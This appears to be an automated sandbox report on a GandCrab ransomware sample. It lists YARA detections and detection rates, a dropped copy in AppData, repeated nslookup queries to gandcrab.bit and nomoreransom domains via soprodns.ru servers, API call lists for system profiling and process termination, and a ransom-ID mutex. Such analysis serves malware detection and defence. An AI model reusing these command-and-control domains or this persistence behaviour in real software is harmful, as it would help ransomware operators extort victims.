Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED | Matched rule: Gandcrab Payload Author: kevoreilly
Source: gI5xZdIxUs.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: gI5xZdIxUs.exe, type: SAMPLE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: gI5xZdIxUs.exe, type: SAMPLE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: gI5xZdIxUs.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: gI5xZdIxUs.exe, type: SAMPLE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: Process Memory Space: gI5xZdIxUs.exe PID: 5280, type: MEMORYSTR | Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC683C0
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC61C20
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC61020
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 14_2_0F9D83C0
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 14_2_0F9D1C20
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 14_2_0F9D1020
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 20_2_0F9D83C0
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 20_2_0F9D1C20
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 20_2_0F9D1020
Source: gI5xZdIxUs.exe | Virustotal: Detection: 85%
Source: gI5xZdIxUs.exe | Metadefender: Detection: 74%
Source: gI5xZdIxUs.exe | ReversingLabs: Detection: 92%
Source: gI5xZdIxUs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\gI5xZdIxUs.exe "C:\Users\user\Desktop\gI5xZdIxUs.exe"
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe
Source: classification engine | Classification label: mal100.rans.troj.evad.winEXE@85/2@305/0
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC67330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC646F0 CreateToolhelp32Snapshot,VirtualAlloc,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,VirtualFree,FindCloseChangeNotification
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1920:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5636:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1960:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=342245cbb89b1482
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
